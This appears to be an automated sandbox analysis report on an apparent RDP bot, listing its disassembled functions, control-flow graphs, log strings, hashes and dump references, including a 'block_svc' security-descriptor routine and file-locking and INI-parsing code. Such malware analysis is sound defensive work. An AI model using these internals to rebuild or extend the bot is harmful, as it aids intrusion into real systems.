                    • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                    • API String ID: 1336347884-544371937
                    • Opcode ID: 3ea3d04103caf584a6be8025fb8b08055c9260d477d2a9eb3e57722f6341be90
                    • Instruction ID: 52c46a6fd8a3e887297dccb89550ee315705141c96b4f9469c73f117d90df9d7
                    • Opcode Fuzzy Hash: 3ea3d04103caf584a6be8025fb8b08055c9260d477d2a9eb3e57722f6341be90
                    • Instruction Fuzzy Hash: B7517062A0DA4382FA10BF57AD80EB8E351AF44B94FD80936D91D472D0DF6CF9769320
                    Function 00007FF70489168C Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 139stringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 405 7ff70489168c-7ff7048916b4 InitializeCriticalSectionAndSpinCount 406 7ff7048917e0-7ff704891801 GetLastError call 7ff7048914e2 405->406 407 7ff7048916ba-7ff7048916ee call 7ff7048919c0 call 7ff704896b9b 405->407 413 7ff704891822-7ff704891828 406->413 414 7ff704891803 406->414 422 7ff7048917b9-7ff7048917d1 call 7ff7048914e2 407->422 423 7ff7048916f4-7ff70489170b strlen 407->423 415 7ff7048918eb 413->415 416 7ff70489182e-7ff704891834 413->416 418 7ff7048918e1-7ff7048918e6 414->418 419 7ff704891809-7ff704891816 414->419 426 7ff7048918f5-7ff7048918fa 415->426 420 7ff704891860-7ff704891863 416->420 421 7ff704891836-7ff70489183c 416->421 418->422 419->413 427 7ff704891865-7ff704891868 420->427 428 7ff70489187d-7ff704891883 420->428 424 7ff704891842-7ff704891848 421->424 425 7ff704891909-7ff70489190e 421->425 438 7ff7048917d6-7ff7048917df 422->438 430 7ff704891723-7ff704891726 423->430 431 7ff70489170d-7ff704891710 423->431 434 7ff704891913-7ff704891918 424->434 435 7ff70489184e-7ff704891854 424->435 425->422 426->422 436 7ff7048918d7 427->436 437 7ff70489186a-7ff70489186d 427->437 439 7ff7048918ff 428->439 440 7ff704891885-7ff70489188a 428->440 432 7ff704891748-7ff704891791 strlen fopen 430->432 433 7ff704891728-7ff704891742 strcat strlen 430->433 431->430 441 7ff704891712-7ff70489171f strlen 431->441 442 7ff704891797-7ff7048917b3 call 7ff7048914e2 432->442 443 7ff7048918ad-7ff7048918c8 call 7ff7048914e2 432->443 433->432 434->422 444 7ff70489188f-7ff704891894 435->444 445 7ff704891856-7ff70489185b 435->445 436->418 437->426 446 7ff704891873-7ff704891878 437->446 439->425 440->422 441->430 442->422 451 7ff70489191d-7ff704891937 call 7ff7048914e2 442->451 443->422 444->422 445->422 446->422 451->438
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
                    • API String ID: 3395718042-2291025694
                    • Opcode ID: 518ad545b8143c4010e70e1190a9f3b2366be347716946774d018b99aa939417
                    • Instruction ID: 495400d6f8234a82fefd8e8e9b5e1a4065452d47196bd878ae92f2ad85225920
                    • Opcode Fuzzy Hash: 518ad545b8143c4010e70e1190a9f3b2366be347716946774d018b99aa939417
                    • Instruction Fuzzy Hash: 15514851A0CA0391FA20BF53ACC8BB89255AF45784FD80932C50E166D6DFACBDB5D361
                    Function 00007FF704895E6F Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 199fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 454 7ff704895e6f-7ff704895e80 455 7ff704895f72-7ff704895fa0 call 7ff7048914e2 454->455 456 7ff704895e86-7ff704895e89 454->456 468 7ff704895f32-7ff704895f35 455->468 457 7ff704895e8f-7ff704895ed4 CreateFileA 456->457 458 7ff704895fa2-7ff704895fd0 call 7ff7048914e2 456->458 460 7ff704895fd5-7ff704895ff9 GetLastError call 7ff7048914e2 457->460 461 7ff704895eda-7ff704895f08 LockFileEx 457->461 458->468 475 7ff704896013-7ff704896019 460->475 476 7ff704895ffb 460->476 466 7ff7048960ba-7ff7048960de GetLastError call 7ff7048914e2 461->466 467 7ff704895f0e-7ff704895f21 461->467 487 7ff7048960e0 466->487 488 7ff7048960f8-7ff7048960fe 466->488 470 7ff704895f27-7ff704895f2c 467->470 471 7ff70489622b-7ff70489622e CloseHandle 467->471 472 7ff704895f37 468->472 473 7ff704895f3e-7ff704895f4b 468->473 470->468 477 7ff704896245-7ff70489625e call 7ff7048914e2 470->477 479 7ff704896239 471->479 472->473 478 7ff704895f51-7ff704895f62 call 7ff7048914e2 473->478 473->479 484 7ff70489601f-7ff704896025 475->484 485 7ff7048961a9 475->485 482 7ff7048960b0 476->482 483 7ff704896001-7ff70489600e 476->483 494 7ff704895f67-7ff704895f71 477->494 478->494 479->477 482->466 483->475 492 7ff704896051-7ff704896054 484->492 493 7ff704896027-7ff70489602d 484->493 499 7ff7048961b3 485->499 495 7ff704896195 487->495 496 7ff7048960e6-7ff7048960f3 487->496 490 7ff7048961ef 488->490 491 7ff704896104-7ff70489610a 488->491 505 7ff7048961f9 490->505 497 7ff704896143-7ff704896149 491->497 498 7ff70489610c-7ff70489610f 491->498 502 7ff704896072-7ff704896078 492->502 503 7ff704896056-7ff704896059 492->503 500 7ff7048961d1 493->500 501 7ff704896033-7ff704896039 493->501 495->485 496->488 510 7ff70489614f-7ff704896155 497->510 511 7ff704896217 497->511 506 7ff704896111-7ff704896114 498->506 507 7ff70489612d-7ff704896133 498->507 515 7ff7048961bd 499->515 513 7ff7048961db 500->513 512 7ff70489603f-7ff704896045 501->512 501->513 508 7ff7048961c7 502->508 509 7ff70489607e 502->509 503->499 504 7ff70489605f-7ff704896062 503->504 514 7ff704896068 504->514 504->515 523 7ff704896203 505->523 506->505 516 7ff70489611a-7ff70489611d 506->516 517 7ff704896139 507->517 518 7ff70489620d 507->518 508->500 522 7ff704896088 509->522 519 7ff704896221 510->519 520 7ff70489615b-7ff704896161 510->520 511->519 521 7ff704896047 512->521 512->522 513->490 514->502 515->508 516->523 524 7ff704896123 516->524 517->497 518->511 519->471 525 7ff704896163 520->525 526 7ff70489616d 520->526 521->492 522->482 523->518 524->507 525->526 526->495
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CloseCreateHandleLock
                    • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
                    • API String ID: 2747014929-530486279
                    • Opcode ID: d1819f04df503fe90d8bfb31b2e46d2cf12326b6f8b3182bba2d6709e2339756
                    • Instruction ID: 434109b2aa46469fbdc8fe31a4d8dba56e60dd89d95942cc3764757d2400a622
                    • Opcode Fuzzy Hash: d1819f04df503fe90d8bfb31b2e46d2cf12326b6f8b3182bba2d6709e2339756
                    • Instruction Fuzzy Hash: F3813F12E0CB0B91FA357F56ACC0B78A2505F00764FD80932D92E166D1FFADBDA58362
                    Function 00007FF7048997F2 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 527 7ff7048997f2-7ff704899814 528 7ff7048998a5-7ff7048998d3 call 7ff7048914e2 527->528 529 7ff70489981a-7ff70489982d call 7ff7048945d5 527->529 534 7ff704899833-7ff70489983b 528->534 529->534 535 7ff7048998d8-7ff7048998e0 529->535 536 7ff704899854-7ff704899856 534->536 537 7ff70489983d-7ff70489984e GetProcessHeap HeapFree 534->537 538 7ff7048998e6-7ff704899900 535->538 539 7ff704899b7e-7ff704899b83 535->539 540 7ff70489985c-7ff70489985f 536->540 541 7ff704899b9e-7ff704899baf call 7ff7048914e2 536->541 537->536 542 7ff704899933-7ff70489993a 538->542 539->534 543 7ff704899861 540->543 544 7ff704899869-7ff704899876 540->544 548 7ff704899bb4 call 7ff7048914e2 541->548 546 7ff70489993c-7ff70489993f 542->546 547 7ff70489995d-7ff704899998 GetProcessHeap HeapAlloc 542->547 543->544 549 7ff704899b92 544->549 550 7ff70489987c-7ff7048998a4 call 7ff7048914e2 544->550 546->547 551 7ff704899941-7ff704899947 546->551 552 7ff7048999d0-7ff7048999e6 call 7ff7048914e2 547->552 553 7ff70489999a-7ff7048999a1 547->553 549->541 555 7ff704899918-7ff70489991b 551->555 556 7ff704899949 551->556 552->553 557 7ff704899b88-7ff704899b8d 553->557 558 7ff7048999a7-7ff7048999ce 553->558 561 7ff70489992f 555->561 562 7ff70489991d-7ff704899927 555->562 564 7ff704899902-7ff704899905 556->564 565 7ff70489994b-7ff70489994e 556->565 557->534 566 7ff704899a2a-7ff704899a37 558->566 561->542 562->561 564->561 570 7ff704899907-7ff70489990a 564->570 567 7ff704899950-7ff704899953 565->567 568 7ff704899929 565->568 566->534 569 7ff704899a3d-7ff704899a40 566->569 567->561 571 7ff704899955-7ff70489995b 567->571 568->561 569->534 572 7ff704899a46-7ff704899a4b 569->572 570->561 573 7ff70489990c-7ff704899916 570->573 571->561 574 7ff704899a51-7ff704899a53 572->574 575 7ff704899b6e-7ff704899b74 572->575 573->561 576 7ff704899a55-7ff704899a57 574->576 577 7ff7048999e8-7ff7048999eb 574->577 575->539 578 7ff704899a26 576->578 580 7ff704899a59-7ff704899a5c 576->580 577->578 579 7ff7048999ed-7ff7048999f1 577->579 578->566 579->578 581 7ff704899a1c-7ff704899a20 580->581 582 7ff704899a5e-7ff704899a61 580->582 581->578 583 7ff7048999f3-7ff704899a11 call 7ff704899770 582->583 584 7ff704899a63-7ff704899aa2 call 7ff704899770 * 2 582->584 583->581 590 7ff704899a13-7ff704899a16 583->590 584->581 593 7ff704899aa8-7ff704899aad 584->593 590->581 592 7ff704899af8-7ff704899b00 590->592 592->581 594 7ff704899b06-7ff704899b09 592->594 593->581 595 7ff704899ab3-7ff704899af3 strncpy * 2 593->595 596 7ff704899b59-7ff704899b6c 594->596 597 7ff704899b0b-7ff704899b21 594->597 595->581 598 7ff704899b28-7ff704899b54 strncpy 596->598 597->598 598->581
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                    • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                    • API String ID: 1423203057-2746879330
                    • Opcode ID: 9c961685ee9913d1762ae8a659e333fbebc391308644367b099cf1cdf6e68488
                    • Instruction ID: 3106e9b654564618986bd195239fe5a208c6bd9ee9114c4c6d63b9f6a5f9a08e
                    • Opcode Fuzzy Hash: 9c961685ee9913d1762ae8a659e333fbebc391308644367b099cf1cdf6e68488
                    • Instruction Fuzzy Hash: D6A1A4A2A0DA8295FA21AF06AC80BB9A751EF41784FCC4839D94D477C5DF7CF965C320
                    Function 00007FF704899195 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 730 7ff704899195-7ff70489919a 731 7ff7048990e4-7ff7048990ec 730->731 732 7ff7048990f2-7ff704899109 GetProcessHeap HeapFree 731->732 733 7ff704898e63-7ff704898e6b 731->733 732->733 734 7ff704898e72-7ff704898e82 733->734 736 7ff704898da0-7ff704898da3 734->736 737 7ff704898e88-7ff704898e8a 734->737 738 7ff704899284-7ff704899299 736->738 739 7ff704898da9-7ff704898db2 FreeLibrary 736->739 737->736 740 7ff704898e90-7ff704898eca call 7ff70489a1f1 737->740 739->738 740->734 743 7ff704898ecc-7ff704898f29 strlen 740->743 745 7ff704898f2f-7ff704898f5e 743->745 746 7ff704898e2e-7ff704898e49 call 7ff7048914e2 743->746 750 7ff704898f64-7ff704898f8d GetProcessHeap HeapAlloc 745->750 751 7ff704898e4b-7ff704898e5e call 7ff7048914e2 745->751 746->734 752 7ff7048990a4-7ff7048990c4 call 7ff7048914e2 750->752 753 7ff704898f93-7ff704898fac 750->753 751->733 752->733 759 7ff704898fb2-7ff704899067 BuildTrusteeWithSidW BuildSecurityDescriptorW 753->759 760 7ff7048990c9-7ff7048990df call 7ff7048914e2 753->760 762 7ff7048991a9-7ff7048991da call 7ff70489795a 759->762 763 7ff70489906d-7ff704899086 call 7ff7048914e2 759->763 760->731 769 7ff7048991ef-7ff704899205 call 7ff7048914e2 762->769 770 7ff7048991dc-7ff7048991ea LocalFree 762->770 771 7ff70489908c 763->771 772 7ff70489910e-7ff704899114 763->772 769->770 770->731 773 7ff70489919f-7ff7048991a4 771->773 774 7ff704899092-7ff70489909f 771->774 775 7ff704899211-7ff704899216 772->775 776 7ff70489911a-7ff704899120 772->776 773->731 774->731 775->731 778 7ff704899122-7ff704899125 776->778 779 7ff704899153-7ff704899159 776->779 781 7ff704899140-7ff704899146 778->781 782 7ff704899127-7ff70489912a 778->782 783 7ff70489915f-7ff704899165 779->783 784 7ff704899239-7ff70489923e 779->784 787 7ff70489922f-7ff704899234 781->787 788 7ff70489914c-7ff704899151 781->788 785 7ff704899130-7ff704899133 782->785 786 7ff70489921b-7ff704899220 782->786 789 7ff704899243-7ff704899248 783->789 790 7ff70489916b-7ff704899171 783->790 784->731 793 7ff704899225-7ff70489922a 785->793 794 7ff704899139-7ff70489913e 785->794 786->731 787->731 788->731 789->731 791 7ff704899177-7ff70489917c 790->791 792 7ff70489924d-7ff704899252 790->792 791->731 792->731 793->731 794->731
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                    • API String ID: 493744553-3317923414
                    • Opcode ID: 15ea6d50e65a1b7c05384c060b9ffa8fcfddfd8832c5a55c0eb87056edab8287
                    • Instruction ID: 63270dfeea49ad1686a6a877b88c25b271d40217823a91f86daf10db8a54a944
                    • Opcode Fuzzy Hash: 15ea6d50e65a1b7c05384c060b9ffa8fcfddfd8832c5a55c0eb87056edab8287
                    • Instruction Fuzzy Hash: E0519F72618BC285E730AF12E8847AAB7A0FF85744F844535CA8D43B98EF7DE558CB50
                    Function 00007FF70489918B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 665 7ff70489918b-7ff704899190 666 7ff7048990e4-7ff7048990ec 665->666 667 7ff7048990f2-7ff704899109 GetProcessHeap HeapFree 666->667 668 7ff704898e63-7ff704898e6b 666->668 667->668 669 7ff704898e72-7ff704898e82 668->669 671 7ff704898da0-7ff704898da3 669->671 672 7ff704898e88-7ff704898e8a 669->672 673 7ff704899284-7ff704899299 671->673 674 7ff704898da9-7ff704898db2 FreeLibrary 671->674 672->671 675 7ff704898e90-7ff704898eca call 7ff70489a1f1 672->675 674->673 675->669 678 7ff704898ecc-7ff704898f29 strlen 675->678 680 7ff704898f2f-7ff704898f5e 678->680 681 7ff704898e2e-7ff704898e49 call 7ff7048914e2 678->681 685 7ff704898f64-7ff704898f8d GetProcessHeap HeapAlloc 680->685 686 7ff704898e4b-7ff704898e5e call 7ff7048914e2 680->686 681->669 687 7ff7048990a4-7ff7048990c4 call 7ff7048914e2 685->687 688 7ff704898f93-7ff704898fac 685->688 686->668 687->668 694 7ff704898fb2-7ff704899067 BuildTrusteeWithSidW BuildSecurityDescriptorW 688->694 695 7ff7048990c9-7ff7048990df call 7ff7048914e2 688->695 697 7ff7048991a9-7ff7048991da call 7ff70489795a 694->697 698 7ff70489906d-7ff704899086 call 7ff7048914e2 694->698 695->666 704 7ff7048991ef-7ff704899205 call 7ff7048914e2 697->704 705 7ff7048991dc-7ff7048991ea LocalFree 697->705 706 7ff70489908c 698->706 707 7ff70489910e-7ff704899114 698->707 704->705 705->666 708 7ff70489919f-7ff7048991a4 706->708 709 7ff704899092-7ff70489909f 706->709 710 7ff704899211-7ff704899216 707->710 711 7ff70489911a-7ff704899120 707->711 708->666 709->666 710->666 713 7ff704899122-7ff704899125 711->713 714 7ff704899153-7ff704899159 711->714 716 7ff704899140-7ff704899146 713->716 717 7ff704899127-7ff70489912a 713->717 718 7ff70489915f-7ff704899165 714->718 719 7ff704899239-7ff70489923e 714->719 722 7ff70489922f-7ff704899234 716->722 723 7ff70489914c-7ff704899151 716->723 720 7ff704899130-7ff704899133 717->720 721 7ff70489921b-7ff704899220 717->721 724 7ff704899243-7ff704899248 718->724 725 7ff70489916b-7ff704899171 718->725 719->666 728 7ff704899225-7ff70489922a 720->728 729 7ff704899139-7ff70489913e 720->729 721->666 722->666 723->666 724->666 726 7ff704899177-7ff70489917c 725->726 727 7ff70489924d-7ff704899252 725->727 726->666 727->666 728->666 729->666
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                    • API String ID: 493744553-3317923414
                    • Opcode ID: 0d5c677c755f7a7bf93115690c4c43bb76cf9dd58e87532489e7b469e434fd69
                    • Instruction ID: 5ac0bcf2a004c8da47966fde3fe48e900493e3efcf8d3abe2b84cd166ecab259
                    • Opcode Fuzzy Hash: 0d5c677c755f7a7bf93115690c4c43bb76cf9dd58e87532489e7b469e434fd69
                    • Instruction Fuzzy Hash: 3B519E72618BC285E730AF12E8847AAB7A0FF85744F844535CA8D43B98EF7DE558CB50
                    Function 00007FF704899181 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 600 7ff704899181-7ff704899186 601 7ff7048990e4-7ff7048990ec 600->601 602 7ff7048990f2-7ff704899109 GetProcessHeap HeapFree 601->602 603 7ff704898e63-7ff704898e6b 601->603 602->603 604 7ff704898e72-7ff704898e82 603->604 606 7ff704898da0-7ff704898da3 604->606 607 7ff704898e88-7ff704898e8a 604->607 608 7ff704899284-7ff704899299 606->608 609 7ff704898da9-7ff704898db2 FreeLibrary 606->609 607->606 610 7ff704898e90-7ff704898eca call 7ff70489a1f1 607->610 609->608 610->604 613 7ff704898ecc-7ff704898f29 strlen 610->613 615 7ff704898f2f-7ff704898f5e 613->615 616 7ff704898e2e-7ff704898e49 call 7ff7048914e2 613->616 620 7ff704898f64-7ff704898f8d GetProcessHeap HeapAlloc 615->620 621 7ff704898e4b-7ff704898e5e call 7ff7048914e2 615->621 616->604 622 7ff7048990a4-7ff7048990c4 call 7ff7048914e2 620->622 623 7ff704898f93-7ff704898fac 620->623 621->603 622->603 629 7ff704898fb2-7ff704899067 BuildTrusteeWithSidW BuildSecurityDescriptorW 623->629 630 7ff7048990c9-7ff7048990df call 7ff7048914e2 623->630 632 7ff7048991a9-7ff7048991da call 7ff70489795a 629->632 633 7ff70489906d-7ff704899086 call 7ff7048914e2 629->633 630->601 639 7ff7048991ef-7ff704899205 call 7ff7048914e2 632->639 640 7ff7048991dc-7ff7048991ea LocalFree 632->640 641 7ff70489908c 633->641 642 7ff70489910e-7ff704899114 633->642 639->640 640->601 643 7ff70489919f-7ff7048991a4 641->643 644 7ff704899092-7ff70489909f 641->644 645 7ff704899211-7ff704899216 642->645 646 7ff70489911a-7ff704899120 642->646 643->601 644->601 645->601 648 7ff704899122-7ff704899125 646->648 649 7ff704899153-7ff704899159 646->649 651 7ff704899140-7ff704899146 648->651 652 7ff704899127-7ff70489912a 648->652 653 7ff70489915f-7ff704899165 649->653 654 7ff704899239-7ff70489923e 649->654 657 7ff70489922f-7ff704899234 651->657 658 7ff70489914c-7ff704899151 651->658 655 7ff704899130-7ff704899133 652->655 656 7ff70489921b-7ff704899220 652->656 659 7ff704899243-7ff704899248 653->659 660 7ff70489916b-7ff704899171 653->660 654->601 663 7ff704899225-7ff70489922a 655->663 664 7ff704899139-7ff70489913e 655->664 656->601 657->601 658->601 659->601 661 7ff704899177-7ff70489917c 660->661 662 7ff70489924d-7ff704899252 660->662 661->601 662->601 663->601 664->601
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                    • API String ID: 493744553-3317923414
                    • Opcode ID: a7f15082d69df05f72d5037cbf794af7c80b7d5605807083d53654b9f1c948c6
                    • Instruction ID: 92f091b0bc42b12282a457720fe8c1626366134854a35503f433e2fc0e234551
                    • Opcode Fuzzy Hash: a7f15082d69df05f72d5037cbf794af7c80b7d5605807083d53654b9f1c948c6
                    • Instruction Fuzzy Hash: 9B518D72618BC285E730AF12E8847AAB7A0FF85744F844535CA8D43B98EF7DE558CB50
                    Function 00007FF704899D40 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2315960449.00007FF704891000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF704890000, based on PE: true
                    • Associated: 0000000B.00000002.2315909031.00007FF704890000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2315982129.00007FF7048A1000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316051356.00007FF7048A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316590597.00007FF7048AA000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316938857.00007FF7048AC000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 0000000B.00000002.2316959480.00007FF7048AF000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_7ff704890000_hstmhco83f64lehv4q0wbzqj3o.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                    • API String ID: 1004003707-3780280517
                    • Opcode ID: 2ee842223cffa98dceb5b62bd9c30b65d7323fe599467d8fbc98665edec57061
                    • Instruction ID: 6c77d2b2bff2e9db79d688187cd47b4a62ab1fe32e6a510fb48adf3491910151
                    • Opcode Fuzzy Hash: 2ee842223cffa98dceb5b62bd9c30b65d7323fe599467d8fbc98665edec57061
                    • Instruction Fuzzy Hash: 804133A2E0DA47A5FA50AF42EC80BB5A360BF44344FD84836D94D066D4DFBCB9B5C364
                    Function 00007FF704899BB9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
